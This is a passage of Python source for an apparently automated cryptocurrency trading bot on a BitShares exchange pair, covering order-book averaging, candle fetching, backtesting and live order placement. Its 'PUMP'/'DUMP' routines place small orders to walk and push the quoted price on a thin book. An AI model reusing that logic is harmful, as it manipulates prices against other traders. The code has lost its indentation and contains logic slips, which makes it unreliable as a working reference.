last = satoshi(last)
elapsed = '%.1f' % (time.time() - start)
print (('%.8f' % last), clock(), 'elapsed: ', elapsed,
'nodes: ', len(last_list), 'type: ', ('%.3f' % rrange), msg)
# update communication file last.txt
race_write('last.txt', text=last)
def last_loop(): # Run last process in loop
while True:
try:
last_process()
time.sleep(30)
# no matter what happens just keep verifying book
except Exception as e:
print (type(e).__name__, e.args, e)
pass
def last_update(): # Run last process once
updated = 0
try:
while not updated:
last_process()
updated = 1
# not satisfied until verified once
except Exception as e:
print (type(e).__name__, e.args, e)
pass
def book_process(): # Write book.txt
DFLOAT = 0.0000000000000001
NODES = 5
def dex_book(market, depth=10): # returns latest orderbook
# dictionary of 4 lists containing bid/ask volume/price
raw = market.orderbook(limit=depth)
bids = raw['bids']
asks = raw['asks']
bidp = [float(bids[i]['price']) for i in range(len(bids))]
bidv = [float(bids[i]['quote']) for i in range(len(bids))]
askp = [float(asks[i]['price']) for i in range(len(asks))]
askv = [float(asks[i]['quote']) for i in range(len(asks))]
book = {'bidp': bidp, 'bidv': bidv, 'askp': askp, 'askv': askv}
if sum(bidp) > sum(askp):
print ('WTF IS THIS SHIT?')
print (book)
return book
def market(n): # returns market class using node "n"
return Market(BitPAIR, bitshares_instance=BitShares(
n, num_retries=0))
tally = {'triple': 0, 'mode': 0, 'median': 0, 'built': 0}
# fetch list of good nodes from file maintained by nodes.py
node_list = nodes()
# fetch last price from 5 dex nodes
start = time.time()
middles = []
book_list = []
nodes_used = []
test = []
msg = ''
for i in range(len(node_list)):
triplicate = 0
if (len(book_list) < NODES) and not triplicate:
try:
m = market(node_list[i])
ret = dex_book(m)
book_list.append(ret)
nodes_used.append(node_list[i])
test.append(i)
except:
pass
sbooks = [str(i) for i in book_list]
if (len(sbooks) >= 3) and len(set(sbooks[-3:])) == 1:
book = book_list[-1]
asksort = sorted(book['askp'])
bidsort = sorted(book['bidp'], reverse=True)
if ((asksort == book['askp']) and
(bidsort == book['bidp']) and
(len(set(asksort)) == len(asksort)) and
(len(set(bidsort)) == len(bidsort)) and
(bidsort[0] < asksort[0])):
msg += 'triplicate book'
triplicate = 1
tally['triple'] += 1
break
else:
msg += 'triplicate book error - '
if triplicate == 0:
# check last list and return best last price with message
try:
book = literal(mode([str(i) for i in book_list]))
asksort = sorted(book['askp'])
bidsort = sorted(book['bidp'], reverse=True)
if 0:
if (asksort != book['askp']):
print('asksort')
if (bidsort != book['bidp']):
print('bidsort')
if (len(set(asksort)) != len(asksort)):
print('askmatch')
if (len(set(bidsort)) != len(bidsort)):
print('bidmatch')
if (bidsort[0] > asksort[0]):
print('mismatched')
if ((asksort == book['askp']) and
(bidsort == book['bidp']) and
(len(set(asksort)) == len(asksort)) and
(len(set(bidsort)) == len(bidsort)) and
(bidsort[0] < asksort[0])):
msg += 'mode book'
tally['mode'] += 1
else:
raise
except:
book = {i: list(np.median([x[i] for x in book_list], axis=0))
for i in ['bidp', 'bidv', 'askp', 'askv']}
asksort = sorted(book['askp'])
bidsort = sorted(book['bidp'], reverse=True)
if 0:
if (asksort != book['askp']):
print('asksort')
if (bidsort != book['bidp']):
print('bidsort')
if (len(set(asksort)) != len(asksort)):
print('askmatch')
if (len(set(bidsort)) != len(bidsort)):
print('bidmatch')
if (bidsort[0] > asksort[0]):
print('mismatched')
if ((asksort == book['askp']) and
(bidsort == book['bidp']) and
(len(set(asksort)) == len(asksort)) and
(len(set(bidsort)) == len(bidsort)) and
(bidsort[0] < asksort[0])):
msg += '!!! MEDIAN BOOK !!!'
tally['median'] += 1
else:
# print ((book['bidp'][:3])[::-1], 'BIDS <> ASKS',
# book['askp'][:3],1)
msg += '!!! RECONSTRUCTED BOOK !!! *****'
tally['built'] += 1
# assure median comprehension did not reorganize book
# prices
prices = []
prices = prices + book['askp'] + book['bidp']
prices = sorted(prices)
z = len(prices)
book['askp'] = prices[int(z / 2):z]
book['bidp'] = prices[0:int(z / 2)]
book['askp'] = sorted(book['askp'])
book['bidp'] = sorted(book['bidp'], reverse=True)
# print ((book['bidp'][:3])[::-1], 'BIDS <> ASKS',
# book['askp'][:3],2)
if book['bidp'][0] == book['askp'][0]:
book['askp'] = [(i + DFLOAT)
for i in book['askp']]
book['bidp'] = [(i - DFLOAT)
for i in book['bidp']]
# print ((book['bidp'][:3])[::-1], 'BIDS <> ASKS',
# book['askp'][:3],3)
for i in list(range(1, len(book['askp']))):
if book['askp'][i] <= book['askp'][i - 1]:
book['askp'][i] = max(
(book['askp'][i - 1] + DFLOAT),
book['askp'][i])
# print ((book['bidp'][:3])[::-1], 'BIDS <> ASKS',
# book['askp'][:3],4)
for i in list(range(1, len(book['bidp']))):
if book['bidp'][i] >= book['bidp'][i - 1]:
book['bidp'][i] = min(
book['bidp'][i - 1] - DFLOAT,
book['bidp'][i])
# print ((book['bidp'][:3])[::-1], 'BIDS <> ASKS',
# book['askp'][:3],4)
rrange = (sum(book['bidp']) + sum(book['askp'])) / (
(len(book['bidp']) + len(book['askp']))) / (
((book['bidp'][0]) + (book['askp'][0]) / 2))
# maintain a log of last price, relative range, and statistics type
elapsed = '%.1f' % (time.time() - start)
'''
sbids = [('%.8f' % i) for i in book['bidp'][:3]]
sbids = sbids[::-1]
sasks = [('%.8f' % i) for i in book['askp'][:3]]
print (sbids, 'BIDS <> ASKS', sasks)
'''
try:
s = sum(tally.values())
ptally = {k: ('%.2f' % (v / s)) for k, v in tally.items()}
# print (tally)
# print (clock(), ptally, 'elapsed: ', elapsed,
# 'nodes: ', len(book_list), 'type: ',
# ('%.3f' % rrange), msg)
except:
pass
# update communication file book.txt
race_write('book.txt', text=book)
def book_loop(): # Run book process in loop
while True:
try:
book_process()
time.sleep(30)
# no matter what happens just keep verifying book
except Exception as e:
print (type(e).__name__, e.args, e)
pass
def book_update(): # Run book process once
updated = 0
try:
while not updated:
book_process()
updated = 1
# not satisfied until verified once
except Exception as e:
print (type(e).__name__, e.args, e)
pass
# CANDLES
def backtest_candles(pair, start, stop, candle): # HLOCV arrays
# gather complete dataset so only one API call is required
raw = chartdata(pair, start, stop, candle)
d = {}
d['unix'] = []
d['high'] = []
d['low'] = []
d['open'] = []
d['close'] = []
for i in range(len(raw)):
d['unix'].append(raw[i]['time'])
d['high'].append(raw[i]['high'])
d['low'].append(raw[i]['low'])
d['open'].append(raw[i]['open'])
d['close'].append(raw[i]['close'])
d['unix'] = np.array(d['unix'])
d['high'] = np.array(d['high'])
d['low'] = np.array(d['low'])
d['open'] = np.array(d['open'])
d['close'] = np.array(d['close'])
# normalize high and low data
for i in range(len(d['close'])):
if d['high'][i] > 2 * d['close'][i]:
d['high'][i] = 2 * d['close'][i]
if d['low'][i] < 0.5 * d['close'][i]:
d['low'][i] = 0.5 * d['close'][i]
return d
def slice_candles(now, data): # Window backtest arrays
# window backtest_candles() data to test each candle
d = {}
for i in range(len(data['unix'])):
if now <= data['unix'][i] < (now + CANDLE):
h = []
l = []
o = []
c = []
for j in range(DEPTH):
try:
h.append(data['high'][i - j])
l.append(data['low'][i - j])
o.append(data['open'][i - j])
c.append(data['close'][i - j])
except:
print("append failed")
pass
# print close
d['high'] = np.array(h[::-1])
d['low'] = np.array(l[::-1])
d['open'] = np.array(o[::-1])
d['close'] = np.array(c[::-1])
return d
def live_candles(pair, candle, depth): # Current HLOCV arrays
# gather latest data to a given depth
now = int(time.time())
raw = chartdata(pair, (now - (depth + 10) * candle), now, candle)
d = {}
d['unix'] = []
d['high'] = []
d['low'] = []
d['open'] = []
d['close'] = []
d['volume'] = []
for i in range(len(raw)):
d['unix'].append(raw[i]['time'])
d['high'].append(raw[i]['high'])
d['low'].append(raw[i]['low'])
d['open'].append(raw[i]['open'])
d['close'].append(raw[i]['close'])
d['volume'].append(raw[i]['volumefrom'])
d['unix'] = np.array(d['unix'][-depth:])
d['high'] = np.array(d['high'][-depth:])
d['low'] = np.array(d['low'][-depth:])
d['open'] = np.array(d['open'][-depth:])
d['close'] = np.array(d['close'][-depth:])
d['volume'] = np.array(d['volume'][-depth:])
return d
def chartdata(pair, start, stop, period): # Public API cryptocompare
#{"time","close","high","low","open","volumefrom","volumeto"}
# docs at https://www.cryptocompare.com/api/
# print(('API call for chartdata %s %ss %se CANDLE %s DAYS %s' % (
# pair, start, stop, period, int((stop - start) / 86400.0))))
if period in [60, 300, 900, 1800, 3600, 7200, 14400, 43200, 86400]:
uri = 'https://min-api.cryptocompare.com/data/'
if period <= 1800:
uri += 'histominute'
aggregate = period / 60.0
if 3600 <= period <= 43200:
uri += 'histohour'
aggregate = period / 3600.0
if period >= 86400:
uri += 'histoday'
aggregate = period / 86400.0
aggregate = int(aggregate)
pair_split = pair.split('_')
fsym = pair_split[1]
tsym = pair_split[0]
toTs = int(stop)
limit = int((stop - start) / float(period))
if limit > 2000:
limit = 2000
params = {'fsym': fsym, 'tsym': tsym, 'limit': 2000,
'aggregate': aggregate, 'toTs': toTs}
ret = requests.get(uri, params=params).json()
d = ret['Data']
clean_d = clean_d1 = [i for i in d if i['close'] > 0]
if (period == 7200) and ((stop - start) / 7200.0 > 1000):
toTs -= period * len(clean_d)
params = {'fsym': fsym, 'tsym': tsym, 'limit': 2000,
'aggregate': aggregate, 'toTs': toTs}
ret = requests.get(uri, params=params).json()
d = ret['Data']
clean_d2 = [i for i in d if i['close'] > 0]
clean_d = clean_d2 + clean_d1
clean_d = [i for i in clean_d if i['time'] > start]
print((len(clean_d),
(clean_d2[-1]['time'], clean_d1[0]['time']),
(clean_d1[0]['time'] - clean_d2[-1]['time'])))
print()
return clean_d
else:
print('invalid period')
return None
def currencies(): # Public API cryptocompare
uri = 'https://min-api.cryptocompare.com/data/all/coinlist'
params = {}
ret = requests.get(uri, params=params).json()
print(('API currencies', len(ret['Data']),
'coins at cryptocompare'))
return ret['Data']
def cryptocompare_time(): # CEX latency test
try:
# print('Cryptocompare API candle time')
uri = 'https://www.cryptocompare.com/api/data/coinsnapshot'
params = {'fsym': ASSET, 'tsym': CURRENCY}
ret = requests.get(uri, params=params).json()
timestamps = []
for i in range(len(ret['Data']['Exchanges'])):
timestamps.append(float(
ret['Data']['Exchanges'][i]['LASTUPDATE']))
cc_time = max(timestamps)
latency = time.time() - cc_time
print(('candle latency :', ('%.2f' % latency)))
return latency
except:
return -1
def cryptocompare_last(): # CEX last price
# print('Cryptocompare API last')
uri = 'https://min-api.cryptocompare.com/data/pricemultifull'
params = {'fsyms': ASSET, 'tsyms': CURRENCY}
ret = requests.get(uri, params=params).json()
raw = ret['RAW'][ASSET][CURRENCY]
price = float(raw['PRICE'])
volume = float(raw['LASTVOLUME'])
cc_time = float(raw['LASTUPDATE'])
latency = time.time() - cc_time
print(('cex_rate latency :', ('%.2f' % latency)))
return price, volume, latency
def marketcap(): # Public API coinmarketcap
asset_cap = asset_dominance = asset_rank = 0
print('API marketcap')
uri = 'https://api.coinmarketcap.com/v1/ticker/'
params = {'limit': 0}
caps = requests.get(uri, params=params).json()
asset_cap = 0
total_cap = 0
for c in caps:
if c['market_cap_usd'] is None:
cap = 0
else:
cap = float(c['market_cap_usd']) / 1000000.0
if c['symbol'] == ASSET:
asset_cap = cap
asset_rank = c['rank']
total_cap += cap
asset_dominance = 100 * asset_cap / total_cap
return asset_cap, asset_dominance, asset_rank
# LIVE
def live_initialize(): # Begin live session
print(VERSION)
print('~====== BEGIN LIVE SESSION =====================~')
global storage
global portfolio
global info
global data
info = {}
data = {}
portfolio = {}
if STORAGE_RESET:
storage = {}
# initialize storage
storage['trades'] = 0
storage['HFT'] = False
storage['previous_v'] = SATOSHI
# initialize info
info['begin'] = int(time.time())
info['tick'] = 0
info['five_minute'] = 0
info['hour'] = 0
info['day'] = 0
info['current_time'] = info['begin']
info['completion_time'] = info['begin'] - 60
info['end'] = None
info['live'] = True
live_chart_latest()
plot_format()
def live(): # Primary live event loop
global storage
live_initialize()
attempt = 0
msg = ''
while True:
plt.pause(1) # prevent inadvertent attack on API's
info['current_time'] = now = int(time.time())
print('')
print(('______________________________%s_cex %s_dex %s' %
(ASSET, BitASSET, time.ctime())))
print('')
# DEBUG LIVE SESSION
debug = 0
if debug:
dex('blocktime')
price, volume, latency = cryptocompare_last()
storage['cc_last'] = {
'price': price, 'volume': volume, 'latency': latency}
cryptocompare_time()
live_data()
indicators()
state_machine()
hourly()
daily()
trade()
scalp()
live_chart()
plot_format()
live_plot()
time.sleep(10)
else:
# RAISE ALARM
if attempt > 2:
time_msg = datetime.fromtimestamp(
now).strftime('%H:%M')
print(
('%s FAIL @@@@@@@ ATTEMPT: %s %s' %
(msg, attempt, time_msg)))
if BELL:
bell(attempt, 432)
# GATHER AND POST PROCESS DATA
try:
dex('blocktime')
except:
msg += 'dex(blocktime) '
attempt += 1
continue
try:
price, volume, latency = cryptocompare_last()
storage['cc_last'] = {
'price': price, 'volume': volume, 'latency': latency}
except:
msg += 'cryptocompare_last() '
attempt += 1
continue
try:
cryptocompare_time()
except:
msg += 'cryptocompare_time() '
attempt += 1
continue
print('')
try:
live_data()
except:
msg += 'live_data() '
attempt += 1
continue
try:
indicators()
except:
msg += 'indicators() '
attempt += 1
continue
try:
state_machine()
except:
msg += 'state_machine() '
attempt += 1
continue
# LOWER FREQENCY EVENTS
check_hour = (info['current_time'] - info['begin']) / 3600.0
if check_hour > info['hour']:
try:
hourly()
info['hour'] += 1
except:
msg += 'hourly() '
attempt += 1
continue
check_day = (info['current_time'] - info['begin']) / 86400.0
if check_day > info['day']:
try:
daily()
info['day'] += 1
except:
msg += 'daily() '
attempt += 1
continue
# TRADE
try:
trade()
except:
msg += 'trade() '
attempt += 1
continue
# SCALP
try:
scalp()
except:
msg += 'scalp() '
attempt += 1
continue
# PLOT
try:
live_chart()
except:
msg += 'live_chart() '
attempt += 1
continue
try:
plot_format()
except:
msg += 'plot_format() '
attempt += 1
continue
try:
live_plot()
except:
msg += 'live_plot() '
attempt += 1
continue
# END PRIMARY TICK
msg = ''
info['tick'] += 1
info['completion_time'] = int(time.time())
attempt = 0
# DELAY NEXT TICK
if not PUMP:
if storage['HFT']:
print('HFT True')
set_timing()
else:
plt.pause(300)
def set_timing(): # Limits HFT to 1 minute interval at end of minute
now = time.time()
elapsed = now - info['begin']
minutes = math.floor(elapsed / TICK)
tick_elapsed = now - info['completion_time']
if (info['tick'] + 1) > minutes:
wait = max(0, (TICK_TIMING - (time.time() % TICK)))
print(('standard wait: %.2f' % wait))
if wait > 0:
plt.pause(wait)
elif tick_elapsed < TICK_MINIMUM:
wait = TICK_MINIMUM - tick_elapsed
print(('minimum wait: %.2f' % wait))
if wait > 0:
plt.pause(wait)
else:
print ('skip set_timing(); no wait')
drift = ((time.time() - info['begin']) - info['tick'] * TICK -
TICK_TIMING + info['begin'] % TICK)
drift_minutes = int(drift // TICK)
print(('drift: %.6f drift minutes %s' % (drift, drift_minutes)))
def live_data(): # Gather live data from public and private api
global portfolio
global data
global storage
# populate 2h candles, 5m candles, and market rate
data['7200'] = live_candles(PAIR, candle=7200, depth=int(MA2 * 13))
data['300'] = live_candles(PAIR, candle=300, depth=300)
cex_rate = storage['cex_rate'] = storage['cc_last']['price']
dex_rate = storage['dex_rate'] = dex('last')
print('')
print(('cex_rate: ', ('%.8f' % cex_rate)))
print(('dex_rate: ', ('%.8f' % dex_rate)))
print(('delta : ', ('%.8f' % (cex_rate - dex_rate))))
print('')
# update portfolio assets and currency
market_balances = dex('market_balances')
portfolio['currency'] = market_balances['currency']
portfolio['assets'] = market_balances['assets']
# Check bitcoin value of account
bts, btc, usd = dex('account_value')
portfolio['btcValue'] = btc
# derive value of assets held and percent invested
portfolio['btcValue_asset'] = cex_rate * portfolio['assets']
portfolio['percent_invested'] = portfolio['btcValue_asset'] / btc
print(('%.2f Bitcoin Value Portfolio' % portfolio['btcValue']))
print(('%.2f Bitcoin Value Asset' % portfolio['btcValue_asset']))
print(('%.2f Percent Invested' % portfolio['percent_invested']))
def scalp(): # Initiate secondary order placement
# localize data
global storage
now = int(time.time())
ask_p = book['askp'][0]
ask_v = book['askv'][0]
bid_p = book['bidp'][0]
bid_v = book['bidv'][0]
ask_p2 = book['askp'][1]
bid_p2 = book['bidp'][1]
cex_rate = storage['cex_rate']
dex_rate = storage['dex_rate']
assets = portfolio['assets']
buying = storage['buying']
selling = storage['selling']
high = storage['high']
low = storage['low']
asset_ratio = storage['asset_ratio']
currency = portfolio['currency']
means = storage['means']
ma3 = storage['ma3'][-1]
ma4 = storage['ma4'][-1]
market_cross = storage['market_cross']
asset_ratio = storage['asset_ratio']
mid_market = storage['mid_market']
min_order = 0.00011 / dex_rate
max_currency = storage['max_currency']
max_assets = storage['max_assets']
# alpha pump/dump signal
penny = None
if cex_rate > mid_market: # RUNNING TO TOP
if asset_ratio > 0.10: # if any assets
penny = 'pump'
if asset_ratio < 0.10: # if not much assets
penny = 'dump'
if cex_rate < mid_market: # IF FALLING TO SUPPORT
if asset_ratio < 0.90: # if any currency
penny = 'dump'
if asset_ratio > 0.90: # if not much currency
penny = 'pump'
# random List integers for scalp placement
x = [i for i in range(4)]
shuffle(x)
# define scalp support and resistance
scalp_resistance = max(high, ma3, ma4)
scalp_support = min(low, ma3, ma4)
# limit scalp ops to buying/selling window
max_scalp_support = ((1 - MIN_MARGIN) * selling) # 97% of selling
min_scalp_resistance = ((1 + MIN_MARGIN) * buying) # 103% of buying
scalp_support = min(scalp_support, max_scalp_support)
scalp_resistance = max(scalp_resistance, min_scalp_resistance)
# limit scalp ops to dex bid/ask
scalp_resistance = max(scalp_resistance, bid_p)
scalp_support = min(scalp_support, ask_p)
# adjust scalp margins if too thin
scalp_margin = (scalp_resistance - scalp_support) / scalp_support
if scalp_margin < MIN_MARGIN:
if penny == 'pump':
scalp_resistance = (1 + MIN_MARGIN) * scalp_support
if penny == 'dump':
scalp_support = (1 - MIN_MARGIN) * scalp_resistance
if penny is None:
midscalp = (scalp_resistance + scalp_support)
scalp_resistance = (1 + MIN_MARGIN / 2) * midscalp
scalp_support = (1 - MIN_MARGIN / 2) * midscalp
# store scalp thresholds globally
storage['scalp_resistance'] = scalp_resistance
storage['scalp_support'] = scalp_support
if RECYCLE:
if penny == 'pump':
# recycle currency
if asset_ratio > (1 - SCALP_FUND):
qty = SCALP_FUND * max_currency * scalp_resistance
qty -= currency * scalp_resistance
print('RECYCLE CURRENCY')
print(('price %.8f qty %s' % (scalp_resistance, qty)))
try:
dex('sell', price=scalp_resistance, amount=qty)
plt.plot(
now, scalp_resistance,
markersize=2 * math.log10(qty),
marker='v', ls='', color='red',
label='RECYCLE')
except:
pass
if penny == 'dump':
# recycle assets
if asset_ratio < SCALP_FUND:
qty = SCALP_FUND * max_currency * scalp_support
qty -= assets
print('RECYCLE ASSETS')
print(('price %.8f qty %s' % (scalp_support, qty)))
try:
dex('buy', price=scalp_support, amount=qty)
plt.plot(
now, scalp_support,
markersize=2 * math.log10(qty),
marker='^', ls='', color='lime',
label='RECYCLE')
except:
pass
if SCALP:
if penny == 'pump':
for i in x:
# SCALP BUY
scalp = scalp_support - i * SATOSHI
qty = (0.0001 / scalp) * 10
qty = (qty * (1 + random())) * (1 + i)
try:
dex('buy', price=scalp, amount=qty)
except:
pass
# SCALP SELL
scalp = scalp_resistance + i * SATOSHI
qty = (0.0001 / scalp) * 10
qty = (qty * (1 + random())) * (1 + i)
try:
dex('sell', price=scalp, amount=qty)
except:
pass
if penny == 'dump':
for i in x:
# SCALP BUY
scalp = scalp_support - i * SATOSHI
qty = (0.0001 / scalp) * 10
qty = (qty * (1 + random())) * (1 + i)
try:
dex('buy', price=scalp, amount=qty)
except:
pass
# SCALP SELL
scalp = scalp_resistance + i * SATOSHI
qty = (0.0001 / scalp) * 10
qty = (qty * (1 + random())) * (1 + i)
try:
dex('sell', price=scalp, amount=qty)
except:
pass
if PUMP:
if penny == 'pump':
set_timing()
# clear spam pump
if ask_v < 5 * (0.00011 / cex_rate):
qty1 = (ask_v) # spam size
qty2 = (0.00011 / cex_rate) # min order
qty = max(qty1, qty2)
print('PUMP 1 - CLEAR SPAM')
print(('pump %.8f qty %.8f' % (ask_p2, qty)))
try:
dex('buy', price=ask_p2, amount=qty)
dex('buy', price=(ask_p - SATOSHI), amount=qty2)
plt.plot(now, ask_p, markersize=5 * math.log10(qty),
marker='^', ls='', color='lime', label='SPAM')
except:
pass
# walk forward pump
elif (ask_p > cex_rate) or (storage['recycle_trigger']):
qty = (0.00011 / cex_rate)
print('PUMP 2 - WALK FORWARD')
print(('pump %.8f qty %.8f' % (ask_p, qty)))
try:
dex('buy', price=ask_p2, amount=qty)
dex('buy', price=(ask_p - SATOSHI), amount=qty)
plt.plot(now, ask_p, markersize=5 * math.log10(qty),
marker='^', ls='', color='lime', label='WALK')
except:
pass
# close gap pump
elif (ask_p - bid_p > 3 * SATOSHI):
qty = (0.00011 / cex_rate)
r = (ask_p - SATOSHI)
print('PUMP 3 - CLOSE GAP')
print(('pump %.8f qty %.8f' % (r, qty)))
try:
dex('buy', price=r, amount=qty)
plt.plot(now, r, markersize=5 * math.log10(qty),
marker='^', ls='', color='lime', label='WALK')
except:
pass
if penny == 'dump':
set_timing()
# clear spam dump
if bid_v < 0.350:
qty1 = bid_v # spam size
qty2 = (0.00011 / bid_p) # min order
qty = max(qty1, qty2)
print('DUMP 1 - CLEAR SPAM')
print(('dump %.8f qty %s' % (bid_p2, qty)))
try:
dex('sell', price=bid_p2, amount=qty)
plt.plot(now, bid_p2, markersize=5 * math.log10(qty),
marker='v', ls='', color='red', label='SPAM')
except:
pass
# walk forward dump
elif (bid_p < cex_rate) or (storage['recycle_trigger']):
qty = (0.00011 / bid_p)
print('DUMP 2 - WALK FORWARD')
print(('dump %.8f qty %s' % (bid_p, qty)))
try:
dex('sell', price=bid_p2, amount=qty)
plt.plot(now, bid_p, markersize=5 * math.log10(qty),
marker='v', ls='', color='red', label='WALK')
except:
pass
# close gap dump
elif (ask_p - bid_p > 3 * SATOSHI):
qty = (0.00011 / cex_rate)
r = (bid_p + SATOSHI)
print('DUMP 3 - CLOSE GAP')
print(('dump %.8f qty %.8f' % (r, qty)))
try:
dex('sell', price=r, amount=qty)
plt.plot(now, r, markersize=5 * math.log10(qty),
marker='^', ls='', color='lime', label='WALK')
except:
pass
# Print trade pair and time
time_LOCAL = datetime.fromtimestamp(
int(time.time())).strftime('%H:%M:%S')
time_UTC = datetime.fromtimestamp(
int(time.time()) + 18000).strftime('%H:%M:%S')
print(('%.2f %s %.2f %s' % (currency, CURRENCY, assets, ASSET)))
print(('%s UTC %s' %
(time_UTC, time_LOCAL)))
print(('(buying: %.8f selling %.8f) (scalp buy %.8f, scalp sell %.8f)' %
(buying, selling, scalp_support, scalp_resistance)))
def trade(): # Initiate primary order placement
global storage
# localize data
buying = storage['buying']
selling = storage['selling']
mid_market = storage['mid_market']
market_cross = storage['market_cross']
buying_r = buying
selling_r = selling
if info['live']: # localize additional data for live session
storage['recycle_trigger'] = False
ask_p = book['askp'][0]
bid_p = book['bidp'][0]
dex_rate = storage['dex_rate']
cex_rate = storage['cex_rate']
assets = portfolio['assets']
asset_ratio = storage['asset_ratio']
means = storage['means']
invested = portfolio['percent_invested']
divested = 100 - invested
min_order = 0.00011 / dex_rate
dex('cancel')
max_assets = (MAX_ASSETS / 100.0) * portfolio['btcValue'] / dex_rate
max_currency = (MAX_CURRENCY / 100.0) * portfolio['btcValue']
print(('assets %.1f, max assets %.1f' % (assets, max_assets)))
pieces = 10.0 # order size
if MANUAL_OVERRIDE:
storage['selling'] = selling = MANUAL_SELL
storage['buying'] = buying = MANUAL_BUY
storage['HFT'] = False
if SCALP or DUMP or PUMP or RECYCLE:
storage['HFT'] = True
qty = max_assets / pieces
if (dex_rate > 0.90 * selling):
print('APPROACHING SELL POINT')
if BELL:
bell(0.5, 800)
if (portfolio['assets'] > 0.1):
if (divested < MAX_CURRENCY):
storage['HFT'] = True
selling_r = max(selling, (dex_rate + ask_p) / 2)
try:
# iceberg
dex('sell', price=selling_r, amount=qty)
print(
('SELLING', PAIR, 'RATE', ('%.8f' %
selling_r), 'AMOUNT', ('%.1f' %
qty)))
# liquidate
if portfolio['assets'] < qty:
qty = (portfolio['assets'] - SATOSHI)
# iceberg
dex('sell', price=selling_r, amount=qty)
print(
('SELLING', PAIR, 'RATE', ('%.8f' %
selling_r), 'AMOUNT', ('%.1f' %
qty)))
# iceberg front limit
selling_r *= 0.985
qty /= 92.0
if random() > 0.5:
dex('sell', price=selling_r, amount=qty)
print(
('SELLING', PAIR, 'RATE', ('%.8f' %
selling_r), 'AMOUNT', ('%.1f' %
qty)))
except:
print('SELL FAILED')
pass
else:
print('MAX DIVESTED')
else:
print('NO ASSETS')
qty = max_assets / pieces
if dex_rate < 1.20 * buying:
print('APPROACHING BUY POINT')
if BELL:
bell(0.5, 800)
if (portfolio['currency'] > 0.1):
if (invested < MAX_ASSETS):
storage['HFT'] = True
buying_r = min(buying, (dex_rate + bid_p) / 2)
try:
dex('buy', price=buying_r, amount=qty)
print(
('BUYING', PAIR, 'RATE', ('%.8f' %
buying_r), 'AMOUNT', ('%.1f' %
qty)))
buying_r *= 1.015
qty /= 92.0
if random() > 0.5:
dex('buy', price=buying_r, amount=qty)
print(
('BUYING', PAIR, 'RATE', ('%.8f' %
buying_r), 'AMOUNT', ('%.1f' %
qty)))
except:
print('buy FAIL')
pass
else:
print('MAX INVESTED')
else:
print ('NO CURRENCY')
else:
# test trade
if portfolio['currency'] > 0:
if (storage['low'][-1] < buying):
buying_r = min(storage['high'][-1], buying)
test_buy(buying_r)
elif portfolio['assets'] > 0:
if storage['high'][-1] > selling:
selling_r = max(storage['low'][-1], selling)
test_sell(selling_r)
def hourly(): # Do this every hour
now = int(time.time())
cex_rate = storage['cex_rate']
print(('hour: %s' % info['hour']))
plt.plot(now, cex_rate, markersize=5, marker='.',
color='white', label='daily')
def daily(): # Do this every day
now = int(time.time())
cex_rate = storage['cex_rate']
print(('day: %s' % info['day']))
plt.plot(now, cex_rate, markersize=10, marker='.',
color='white', label='daily')
# BACKTEST
def initialize(): # Open plot, set backtest days
global DAYS
if MODE == 0:
print('~=== OPTIMIZING ======================~')
if MODE == 1:
print('~=== BEGIN BACKTEST ==================~')
if MODE == 2:
print('~=== WARMING UP PAPER SESSION ========~')
if MODE == 3:
print('~=== WARMING UP LIVE MACHINE =========~')
if MODE == 4:
print('~=== BEGIN SALES BACKTEST ============~')
if LIVE:
DAYS = 90
else:
DAYS = len(chartdata(PAIR, 1390000000, int(time.time()), 86400))
if ASSET == 'BTS': # filter glitch in dataset
DAYS -= 250
if CURRENCY == 'BITCNY':
DAYS -= 200
elif ASSET == 'DASH': # filter glitch in dataset
DAYS -= 360
elif ASSET == 'NXT': # filter glitch in dataset
DAYS -= 300
else:
DAYS -= 100
if (SALES or OPTIMIZE) and (DAYS >= 365):
DAYS = 365
if LIVE or BACKTEST:
plt.ion()
fig = plt.figure()
fig.patch.set_facecolor('0.15')
def holdings(): # Calculate starting portfolio
if info['tick'] == 0:
close = data['close'][-DAYS]
else:
close = storage['close'][-1]
storage['max_assets'] = (portfolio['assets'] +
(portfolio['currency'] / close))
storage['max_currency'] = (portfolio['currency'] +
(portfolio['assets'] * close))
if info['tick'] == 0:
storage['begin_max_assets'] = storage['max_assets']
storage['begin_max_currency'] = storage['max_currency']
storage['start_price'] = close
def test_initialize(): # Begin backtest session
now = int(time.time())
global storage
global portfolio
global info
global data
# initialize storage
storage['trades'] = 0
storage['buys'] = [[], []]
storage['sells'] = [[], []]
# initialize portfolio balances
portfolio['assets'] = float(START_ASSETS)
portfolio['currency'] = float(START_CURRENCY)
# initialize info dictionary objects
info['begin'] = now - DAYS * 86400
info['end'] = now
info['tick'] = 0
info['current_time'] = info['begin']
info['origin'] = info['begin'] - int(1.1 * MA2 * 86400)
info['live'] = False
print(('Dataset.....: %s DAYS' %
int((now - info['origin']) / 86400.0)))
print(('Backtesting.: %s DAYS' %
int((now - info['begin']) / 86400.0)))
# check for compatible interval
if CANDLE not in [300, 900, 1800, 7200, 14400, 86400]:
print(('Tick Interval must be in [300, 900,' +
'1800, 7200, 14400, 86400]'))
raise stop()
# gather complete data set for backtest
if LIVE or BACKTEST:
# print(((now - info['origin']) / float(CANDLE)))
data = backtest_candles(PAIR, info['origin'], now, CANDLE)
# print(CANDLE)
# print((len(data['unix']), (data['unix'][1] - data['unix'][0])))
# print((min(data['unix']), time.ctime(min(data['unix'])), 'mindate'))
# print((info['origin'], time.ctime(info['origin']), 'origin'))
print('')
print(('PAIR......: %s' % PAIR))
print(('BitPAIR...: %s' % BitPAIR))
print('')
print(('CANDLE....: %s' % CANDLE))
# print(('ORIGIN....: %s %s' % (info['origin'],
# time.ctime(info['origin']))))
# print(('BEGIN.....: %s %s' % (info['begin'],
# time.ctime(info['begin']))))
plot_format()
if LIVE:
test_chart_latest()
def backtest(): # Primary backtest event loop; the cost funtion
#===================================================================
''' BACKTEST EVENT LOOP '''
#===================================================================
global storage
while True:
# print(info['current_time'], 'current_time')
# print(info['end'], 'end')
if info['current_time'] < info['end']:
# print info['current_time'], time.ctime(info['current_time'])
# print (data)
# print (len(data['unix']))
# print (data)
# print (info['current_time'])
data_slice = slice_candles(info['current_time'], data)
storage['high'] = data_slice['high']
storage['low'] = data_slice['low']
storage['open'] = data_slice['open']
storage['close'] = data_slice['close']
holdings()
indicators()
state_machine()
trade()
if LIVE or BACKTEST:
test_chart()
info['current_time'] += CANDLE
info['tick'] += 1
else:
test_stop()
print_tune()
if LIVE or BACKTEST:
test_plot()
plt.pause(0.0001)
if BACKTEST:
plt.ioff()
try:
plot_format()
except:
pass
plt.show()
break
def test_buy(price): # Execute a backtest buy
storage['trades'] += 1
now = time.ctime(info['current_time'])
